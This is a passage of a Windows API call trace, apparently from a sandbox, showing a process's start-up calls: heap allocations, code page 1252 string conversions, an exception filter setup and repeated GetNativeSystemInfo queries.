	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x2e) returned 0x79c3318
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x28) returned 0x79c3350
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x1e) returned 0x79c1890
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x2c) returned 0x79c3380
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x54) returned 0x79c33b8
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x52) returned 0x79c3418
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x2a) returned 0x79c3478
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x3c) returned 0x79c34b0
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x54) returned 0x79c34f8
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x24) returned 0x79c3558
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x30) returned 0x79c3588
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x8c) returned 0x79c60d8
	[0126.260] HeapFree (in: hHeap=0x79b0000, dwFlags=0x0, lpMem=0x79c35c8 | out: hHeap=0x79b0000) returned 1
	[0126.261] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x80) returned 0x79c35c8
	[0126.261] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0126.261] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x800) returned 0x79c3650
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] GetACP () returned 0x4e4
	[0126.261] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x220) returned 0x79c3e58
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] IsValidCodePage (CodePage=0x4e4) returned 1
	[0126.261] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1
	[0126.261] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0126.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0126.261] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1
	[0126.261] GetLastError () returned 0x0
	[0126.261] SetLastError (dwErrCode=0x0) 
	[0126.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0126.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0126.261] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0126.262] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0126.262] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84¦C°äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0126.262] GetLastError () returned 0x0
	[0126.262] SetLastError (dwErrCode=0x0) 
	[0126.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0126.262] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0126.262] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0126.262] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0126.262] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84¦C°äþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0126.262] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4050f2) returned 0x0
	[0126.262] RtlSizeHeap (HeapHandle=0x79b0000, Flags=0x0, MemoryPointer=0x79c35c8) returned 0x80
	[0126.262] RtlSizeHeap (HeapHandle=0x79b0000, Flags=0x0, MemoryPointer=0x79c35c8) returned 0x80
	[0126.263] RtlSizeHeap (HeapHandle=0x79b0000, Flags=0x0, MemoryPointer=0x79c35c8) returned 0x80
	[0126.263] RtlSizeHeap (HeapHandle=0x79b0000, Flags=0x0, MemoryPointer=0x79c35c8) returned 0x80
	[0126.263] lstrlenW (lpString="") returned 0
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.263] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.264] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.265] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
